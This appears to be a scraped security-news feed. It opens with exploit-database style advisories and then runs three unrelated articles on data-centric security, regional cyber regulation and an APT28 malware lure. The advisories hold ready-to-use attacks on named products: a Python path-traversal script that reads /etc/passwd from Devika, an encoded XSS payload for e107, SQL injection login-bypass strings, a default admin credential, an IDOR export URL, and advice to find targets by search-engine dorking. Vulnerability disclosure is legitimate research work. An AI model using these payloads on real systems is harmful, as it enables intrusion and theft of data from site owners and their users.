Genexus Protection Server version 9.7.2.10 suffers from an unquoted service path vulnerability.

    #Exploit Title: Genexus Protection Server 9.7.2.10 - 'protsrvservice' Unquoted Service Path Service Path#Exploit Author : SamAlucard#Exploit Date: 2024-07-31#Vendor : Genexus#Version : Genexus Protection Server 9.7.2.10#Software Link: https://www.genexus.com/en/developers/downloadcenter?data=;;#Vendor Homepage :  https://www.genexus.com/es/#Tested on OS: Windows 10 Pro#Analyze PoC :==============C:\>sc qc protsrvservice[SC] QueryServiceConfig CORRECTONOMBRE_SERVICIO: protsrvservice        TIPO               : 10  WIN32_OWN_PROCESS        TIPO_INICIO        : 2   AUTO_START        CONTROL_ERROR      : 1   NORMAL        NOMBRE_RUTA_BINARIO: C:\Program Files(x86)\CommonFiles\Artech\GXProt1\ProtSrv.exe        GRUPO_ORDEN_CARGA  :        ETIQUETA           : 0        NOMBRE_MOSTRAR     : ProtSrvService        DEPENDENCIAS       : RPCSS        NOMBRE_INICIO_SERVICIO: LocalSystem

Genexus Protection Server 9.7.2.10 Unquoted Service Path

Devika version 1 suffers from a path traversal vulnerability.

    # Exploit Title: Devika v1 - Path Traversal via 'snapshot_path' Parameter# Google Dork: N/A# Date: 2024-06-29# Exploit Author: Alperen Ergel# Contact: @alpernae (IG/X)# Vendor Homepage: https://devikaai.co/# Software Link: https://github.com/stitionai/devika# Version: v1# Tested on: Windows 11 Home Edition# CVE: CVE-2024-40422#!/usr/bin/pythonimport argparseimport requestsdef exploit(target_url):    url = f'http://{target_url}/api/get-browser-snapshot'    params = {        'snapshot_path': '../../../../etc/passwd'    }    response = requests.get(url, params=params)    print(response.text)if __name__ == "__main__":    parser = argparse.ArgumentParser(description='Exploit directory traversal vulnerability.')    parser.add_argument('-t', '--target', help='Target URL (e.g., target.com)', required=True)    args = parser.parse_args()    exploit(args.target)

Devika 1 Path Traversal

e107 version 2.3.3 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : e107 v2.3.3 XSS Vulnerability                                                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://unlimited.dl.sourceforge.net/project/e107/e107/e107%20v2.3.3/e107_2.3.3_full.zip?viasf=1                            |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /image.php?mode=main&action=dialog&for=_commonh5it1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281986%2529%253edezaw&tagid=media-cat-image&iframe=1&w=206&image=1[+] LOgin : http://127.0.0.1/233/e107_admin/[+] http://127.0.0.1/233/e107_admin/image.php?mode=main&action=dialog&for=_commonh5it1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281986%2529%253edezaw&tagid=media-cat-image&iframe=1&w=206&image=1Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

e107 2.3.3 Cross Site Scripting

Codeprojects E-Commerce version 1.0 suffers from an ignored default credential vulnerability.

    =============================================================================================================================================| # Title     : Codeprojects E-Commerce v1.0 Insecure Settings Vulnerability                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://code-projects.org/?s=Ecommerce                                                                                      |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@admin.com & pass = password[+] https://www/127.0.0.1/demo/comdeptcmru.acth/59143214/admin/products.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Codeprojects E-Commerce 1.0 Insecure Settings

Blog Site version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Blog Site 1.0 Auth By Pass Vulnerability                                                                                    || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/blog-site-using-php_0.zip                             |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass = ' or 0=0 ##[+] Panel : http://127.0.0.1//blog/admin/index.php?page=manage_postGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Blog Site 1.0 SQL Injection

Best Courier Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Best Courier Management System v1.0 Auth By Pass Vulnerability                                                              || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php                                     |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user : 'or''='@gmail.com & pass = 'or''='[+] Panel : http://127.0.0.1/gaatitrack/login.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Best Courier Management System 1.0 SQL Injection

Appointment Scheduler version 4.0 suffers from an insecure direct object reference vulnerability.

    =============================================================================================================================================| # Title     : Appointment Scheduler v4.0 IDOR Vulnerability                                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://auth.phpjabbers.com/download/727641/53089/d9b13cca42bb941a9f06d96f22fb7743                                          |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : Allows you as a visitor to access the control panel without permissions.[+] use payload : index.php?controller=pjAdminBookings&action=pjActionExport[+] http://127.0.0.1/AppointmentSchedulerDe/index.php?controller=pjAdminBookings&action=pjActionExportGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Appointment Scheduler 4.0 Insecure Direct Object Reference

Adopting a military mindset toward cybersecurity means the industry moves beyond the current network protection strategies and toward a data-centric security approach.

Source: ber1a via Alamy Stock Vector

COMMENTARY

Cybercriminals, terrorists, and nation-states are now striking at commercial entities in ways that can kill and injure people or cause physical destruction. A recent attack on Ascension Healthcare Network forced hospitals to divert patients, reschedule appointments, and resort to manual systems, which could have resulted in serious harm to patients. In 2023, two suspects were arrested for conspiring to attack Baltimore's power grid. The potential harm of such an attack has the US government scrambling to improve security.

In addition to the increased "physical" seriousness of these attacks, company executives can now be held legally responsible for them. In 2022, a federal jury found former Uber CSO Joseph Sullivan guilty of obstruction for actions following the company's breach. In 2023, the Securities and Exchange Commission announced charges against SolarWinds chief information security officer (CISO) Timothy Brown in a similar case (many of which were later thrown out). And earlier this year, Microsoft announced that it will “hold senior leadership directly accountable for cybersecurity.”

We historically have distinguished between attacks on business data — financially motivated incidents that threaten an organization's bottom line in the form of fines, loss of intellectual property, and reputational damage — and state-sponsored attacks on military secrets that have the potential to kill and injure people or undermine the operation of the government. Unfortunately, recent events have blurred the line between physical and cybersecurity, forcing businesses to raise the priority of protecting sensitive data, similar to the military.

**The Military Mindset**

In the military, protecting sensitive information has always been paramount, and the industry prioritizes whatever systems it needs for protection, including multiple layers of physical and digital security. The information simply can't be compromised.

By contrast, businesses are more likely to do a cost-benefit analysis, weighing the costs of securing data against the costs of recovering from the damage. As a result, the industry has never built a data-centric security stack, instead preferring a network-based security approach focused on keeping the bad guys out and responding quickly to contain breaches. However, if an attacker breaches the network security layer, sensitive data is quickly exfiltrated and exposed before most organizations can respond to contain the incident.

In order to safeguard their employees and business interests, organizations need to change their mindset to protect sensitive data with the same intensity as the armed forces, intelligence community, and defense industry.

**Principles of a New Data Protection Strategy**

1\. Principle of least privilege (PoLP)

The principle of least privilege in the military and intelligence community mandates that individuals have access only to the information and resources necessary for their specific duties. This minimizes the risk of unauthorized access, data breaches, and espionage by limiting exposure to sensitive information, which thereby enhances overall security and operational integrity.

Similarly, business systems should provide only the right data to the right people at the right time. Recent privacy laws have forced many organizations to begin implementing this capability, but most organizations are a long way from building least privilege into the very fabric of their data infrastructure. Implementing strong data security requires understanding the context of the users' role and duties found in identity access management (IAM) infrastructures, understanding privacy compliance requirements, and having the ability to automatically identify and secure sensitive information in real-time across on-premises infrastructure, public cloud, software-as-a-service (SaaS) applications, and the organization's supply chain. 

2\. Never trust a third party with data

Data must stay where the company can control and protect it. Attackers go after the weakest link in the data supply chain, and this increasingly means people outside the organization, including children, and third-party data platforms, as with SolarWinds. Companies also lose control of data when it's stored on a vendor's cloud data platform where the vendor's security failures put the data at risk. Thus, companies must ensure that vendors who become part of their data ecosystem do not store it, see it, or otherwise have access to it. This can be accomplished by redacting, masking, tokenizing, or encrypting sensitive data automatically as it leaves the control of the organization.

3\. Identify threats in real-time

Too often, businesses have settled for security architecture centered on detection and response with poor response times. According to the 2023 IBM Security "Cost of a Data Breach Report," the mean time to identify (MTTI) and contain (MTTC) a breach is 277 days. When extensive AI and automation were used for incident response, it still took 214 days to identify and contain breaches. In order to prevent data breaches from resulting in the loss of personally identifiable information (PII), we must shift the focus from reactive containment measures that are not working to proactive data security measures that leverage AI to identify and protect sensitive data in real-time as it flows through the organization and block attempts by unauthorized users to access, steal, or manipulate business-critical information.

4\. Never undermine productivity

An impediment to increased security has long been that added security makes processes slower and inhibits legitimate access to data, frustrating users, constraining collaboration, undermining customer experiences, and stifling innovation. To encourage adoption and use, data security solutions must protect data without delaying operations. Otherwise, users will find a way around it.

5\. Make it fast and easy to deploy

Whatever solutions the industry devises, companies must be able to implement them quickly with little disruption to existing workflows. Otherwise, at best, risks could increase during the implementation process. At worst, the solutions won't be implemented at all or will leave critical gaps in the organization's defenses.

**A Call to Arms**

In practical terms, adopting a military mindset toward cybersecurity means organizations must immediately begin demanding that the industry moves beyond the current network protection strategies and toward a data-centric security approach that proactively secures data in real-time. These actions include:

*   Make data protection a topic at board meetings and throughout the organization.
    
*   Ask every vendor about their approach to protecting data, not just the network.
    
*   Ensure every data supply chain partner is working to adopt the above data protection principles.
    
*   Encourage industry regulators to make these principles a key focus.
    
*   Put pressure on the government to require agencies to adopt these principles.
    

These strategies are crucial for moving toward a data-centric security approach that effectively safeguards organizations against evolving cyber threats.

**About the Authors**

Founder & CEO, Dymium

Denzil Wessels is the founder and CEO of Dymium. He’s an established technology leader and an emerging pioneer who is focused on building new technologies and products that solve networking and security challenges.

He is passionate about identifying and solving difficult enterprise business problems in new and unique ways that did not exist in the industry before.

Using this approach, he is able to help build new business, business groups, and successfully transform existing companies looking to grow. His lineage includes companies like Zscaler, Aruba Networks (HPE), Juniper, and F5 Networks.

COO, Dymium

Glenn Ignazio is the COO of Dymium and a retired Air Force Special Operations commander and national security expert. He is best known for his experience translating complex technology into military and intelligence operations that position solutions into commercial, defense, and government organizations. A sought-after national security expert, he's advised defense agencies globally, including the US Assistant Secretary of Defense and UAE Royal Family. Beyond his 22-year military service, Glenn’s impact extends to solution architecture, business development, executive, and operations roles. He holds an executive MBA and has earned recognition for combat operations.

Protect Data Differently for a Different World

Ultimately, a more cyber-secure world requires a global governing body to regulate and campaign for cybersecurity, with consistent regulatory requirements in the various regions around the world.

Joanna Huisman, Senior Vice President of Strategic Insights & Research, KnowBe4

August 5, 2024

3 Min Read

Source: Iulia Bycheva via Alamy

COMMENTARY

Cybersecurity regulations differ across regions, as does the level of security culture. As a result, cybercriminals are better able to take advantage of weak spots arising from the lack of a global governing cyber alliance. We remain scattered when it comes to overarching procedures and cybersecurity response. From North and South America to Asia, Africa, Europe, and Oceania, cybercrime is prospering within the regulatory gaps.

To bridge these gaps, governments worldwide must collaborate closely to come to a consensus on how to deal with cybersecurity incidents. Unfortunately, this is not the kind of thing that will happen immediately. But by understanding the state of global security culture and regulation, we can point ourselves in the right direction. 

**The Americas**

While the emphasis of security culture in North America has resulted in changes to cybersecurity best practices, there are still plenty of major cyberattacks hitting the news. Ransomware events against MGM and United Healthcare show that even as the workforce improves its level of security awareness, there is a long way to go.

Security culture in South America is even more spotty. The varying levels of development across South American countries means cybersecurity companies will avoid investing too much effort in a less prolific region. Additionally, while there are some key regulatory requirements within South America, the lack of consistency across countries there puts the continent at a disadvantage. Though Colombia may be one of the more prepared countries with its strong outline of cyber strategies in its National Council of Economic and Social Policy, the region as a whole is not.

**Africa & Europe**

Africa, which has up to 2,000 unique languages and a quickly growing population, is rapidly adopting technology. African organizations have also experienced the most growth in cybercrime over the past couple of years. With such a quickly evolving environment, security culture will take a while to catch up.

While various African countries boast cybersecurity legislation, the African Union's Convention on Cybersecurity and Personal Data Protection has only been ratified by 15 of the 55 countries. This is concerning, since the South African Council for Scientific and Industrial Research predicts an increase in cyberattacks against critical infrastructure and government organizations.

In Europe, security awareness increasingly is gaining traction, but a range of attitudes toward cybersecurity culture remains.

While European cybersecurity regulations seem to be on track — for example, the well-established General Data Protection Regulation (GDPR) as well as the Digital Operational Resilience Act (DORA), which will be effective in 2025 — the truth is that many organizations haven't taken substantive efforts to develop a security culture, leaving them vulnerable to cyberattacks.

**Asia & Oceania**

Cybersecurity across Asia varies widely due to Asia's diversity of culture and languages.

While legislation like the Association of Southeast Asian Nations (ASEAN) is a great step at unifying portions of the region, Asia is fragmented, and will likely remain so for some time. This is unfortunate timing, as the Allianz Commercial Risk Barometer for 2024 predicts ransomware, malware, and social engineering to be the highest risks facing Asian organizations.

While Oceania is taking some important steps in solidifying a strong cybersecurity culture, the region has a long way to go. However, due to recent data breaches in the region — Latitude Financial, Optus, and Medibank — cybersecurity is considered more of a shared responsibility.

Additionally, the Australian government has implemented various cybersecurity awareness campaigns teaching citizens how to remain abreast of cyber threats. Meanwhile, Australia and New Zealand have each released their own cyber-strategy policies, which encourage cyber resiliency and foster security culture.

**Global Cyber Cooperation**

The ultimate solution, however idealistic, is for an overarching governing body to regulate and campaign for cybersecurity across the globe. In conjunction, each region should have its own consistent regulatory requirements. But that will take time.

In the meantime, individual organizations and individuals themselves can do various things to protect themselves in the face of increased cyber threat. It all begins with a strong security culture. While it may be more difficult for some organizations, the basis for a robust security culture is for everyone involved to feel responsible for their workplace, their city, their country, and so on.

**About the Author**

Senior Vice President of Strategic Insights & Research, KnowBe4

Joanna Huisman is Senior Vice President, Strategic Insights & Research, at KnowBe4, the provider of the world's largest security awareness training and simulated phishing platform used by more than 65,000 organizations around the globe.

How Regional Regulations Shape Global Cybersecurity Culture

The scheme, from the group also known as APT28, involves targeting Eastern European diplomats in need of personal transportation and tempting them with a purported good deal on a Audi Q7 Quattro SUV.

Source: Uwe Deffner via Alamy Stock Photo

A prolific Russian threat actor known as Fighting Ursa is targeting diplomats through a used-car sale email scheme that then distributes HeadLace backdoor malware.

The gambit involves downloading a .zip file supposedly containing car images of an Audi Q7 Quattro SUV that's been outfitted for diplomatic use; but in fact, the files are executables whose .exe extensions are hidden by default in Microsoft Windows.

The photos of the vehicle are accompanied by a Romanian phone number and a contact at the Southeast European Law Enforcement Center to lend the ad additional credibility.

Fighting Ursa (aka APT28, Fancy Bear, and Sofacy) has adopted the tactic from other Russian threat actors, according to a report on the attack published by Palo Alto Networks' Unit 42.

In July 2023, Unit42 reported on the Russian threat actor Cloaked Ursa, which was using a similar lure — that time a used BMW sedan in Kyiv — to target diplomats working at embassies in Ukraine.

"These lures tend to resonate with diplomats and get targets to click on the malicious content," the blog post noted.

**"Audi" Cyberattack Routine Drives Espionage**

The attack chain begins with the use of the legitimate, free service known as "webhook" to host a malicious HTML page — a tactic that Unit 42 noted is often associated with APT28.

This page then determines if the target machine is running Windows. If it is, a .zip archive is offered for download. If the system is not Windows-based, the user is redirected to a decoy image.

Inside the .zip archive are three files: a Windows calculator executable disguised as an image file, a malicious dynamic link library (DLL), and a batch script.

The calculator executable is used to load the malicious DLL, which then runs the batch script.

The batch script then executes a command to retrieve a file from another webhook site URL, saves it in the downloads folder, renames it for execution, and then deletes it afterward to cover the attack’s tracks. That file contains the HeadLace backdoor, which establishes persistent access to a victim's machine in order to set the stage for follow-on data theft, reconnaissance, and surveillance activities.

"While the infrastructure used by Fighting Ursa varies for different attack campaigns, the group frequently relies on these freely available services \[like webhook\]," a Unit 42 post explained. "Furthermore, the tactics from this campaign fit with previously documented Fighting Ursa campaigns, and the HeadLace backdoor is exclusive to this threat actor."

**Disabling Hide File Extension Options**

Roger Grimes, data-driven defense evangelist at KnowBe4, explains that for nearly as long as Windows has been around, it has automatically hidden the file extension of dozens of commonly used files, such as .exe, .scr, .dll, etc.

"This allows an attacker to create a file — for example, 'carphotos.jpg.exe' — that appears to most Windows users as carphotos.jpg," he explains.

For the real file extension not to be hidden, a user must intentionally disable the "hide file extensions" option in Windows, often having to do so in multiple places.

"Why Microsoft continues to allow hiding file extensions to be the default setting for decades is beyond me, as it is responsible for many tens of millions of exploitations," Grimes says. "It's far past the time for Microsoft to disable this dangerous default."

Microsoft did not immediately respond to a request for comment.

**Fighting Ursa: A Very Active Russian Cyber-Threat Actor**

The hacking group, which most researchers track as APT28, has a long and infamous history as the perpetrators of US election interference in 2016, the NotPetya attacks, the Olympic Destroyer effort, and other high-profile cyber offensives.

More recently, it has targeted Ukrainian government bodies with spear-phishing emails posing as Windows Update guides to trick recipients into executing malicious PowerShell commands.

And in 2022, it disseminated a malicious document exploiting the now-patched CVE-2022-30190 flaw through phishing emails to Ukrainian users. The document, titled “Nuclear Terrorism: A Very Real Threat.rtf,” aimed to exploit concerns about the war in Ukraine escalating into a nuclear disaster.

The threat group has also targeted Ukraine's energy infrastructure, and recently built GooseEgg, a custom tool used to exploit CVE-2022-38028 in attacks directed toward Ukraine, Western Europe, and North America.

**About the Author**

Nathan Eddy is a freelance journalist and award-winning documentary filmmaker specializing in IT security, autonomous vehicle technology, customer experience technology, and architecture and urban planning. A graduate of Northwestern University’s Medill School of Journalism, Nathan currently lives in Berlin, Germany.

Tag

#auth